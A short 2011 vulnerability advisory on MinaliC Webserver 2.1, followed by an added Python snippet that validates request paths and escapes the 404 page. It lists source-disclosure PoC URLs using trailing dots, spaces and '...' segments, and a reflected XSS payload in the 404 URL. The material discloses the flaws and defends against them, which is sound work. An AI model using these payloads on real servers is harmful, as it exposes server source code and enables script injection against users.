=============================================================
0-Exploit (Zer0 Thunder)
-------------------------------------------------------------
MinaliC Webserver SCD & XSS Vulnerability
Tested on : Windows XP SP3
Date      : 28/07/2011
=============================================================

Source Code Disclosure
----------------------
There is a source code disclosure vulnerability in MinaliC Webserver, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused by a validation error in the handling of the filename extension supplied by the user in the URL. This can be exploited to retrieve the source code of script files from the server via specially crafted requests containing dot, space and slash characters.

The vulnerability has been confirmed in version 2.1. Other versions may also be affected.

Source Code Disclosure PoCs
- http://localhost:8080/index.htm+
- http://localhost:8080/index.htm.
- http://localhost:8080/index.htm/.../
- http://localhost:8080/.../index.htm

Cross Site Scripting
---------------------
MinaliC Webserver has an XSS vulnerability in its 404 page, which allows us to insert HTML code through the URL.

XSS PoC
- http://localhost:8080/%3CBODY%20ONLOAD=alert%28%27XSS%27%29%3E/ [Result 404]

E-mail    : neonwarlock@live.com
Site/blog : zt-security.com
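
An added example, not part of the original advisory and not MinaliC's code: a request-path check of the kind the advisory says is missing, applied before a path is mapped to a file or handler, together with a 404 renderer that escapes the reflected path. The function names are hypothetical, and treating '+' as a space is an assumption drawn from the first PoC.

```python
import html
import re
from urllib.parse import unquote

TRAILING_JUNK = re.compile(r"[.\s]+$")   # segment ends in dots or whitespace
DOTS_ONLY = re.compile(r"^\.{2,}$")      # "..", "...", and longer runs


def check_request_path(raw_path):
    """Return a sorted list of reasons to reject raw_path; empty means accept."""
    # Decode once, then validate the decoded form that the file lookup will use.
    # Assumption: the server maps '+' to a space, as the first PoC implies.
    path = unquote(raw_path).replace("+", " ")
    reasons = set()
    for segment in (s for s in path.split("/") if s):
        if DOTS_ONLY.match(segment):
            reasons.add("dot-only segment")
        elif TRAILING_JUNK.search(segment):
            reasons.add("trailing dot or space")
        if "<" in segment or ">" in segment:
            reasons.add("markup characters")
    return sorted(reasons)


def render_404(raw_path):
    """Build a 404 body that shows the requested path as text, never as markup."""
    shown = html.escape(unquote(raw_path), quote=True)
    return "<html><body><h1>404 Not Found</h1><p>" + shown + "</p></body></html>"


# Paths taken from the advisory's PoC URLs, plus one ordinary request.
SAMPLE_PATHS = [
    "/index.htm",
    "/index.htm+",
    "/index.htm.",
    "/index.htm/.../",
    "/.../index.htm",
    "/%3CBODY%20ONLOAD=alert%28%27XSS%27%29%3E/",
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(p, "->", check_request_path(p) or "accept")
    print(render_404(SAMPLE_PATHS[-1]))
```
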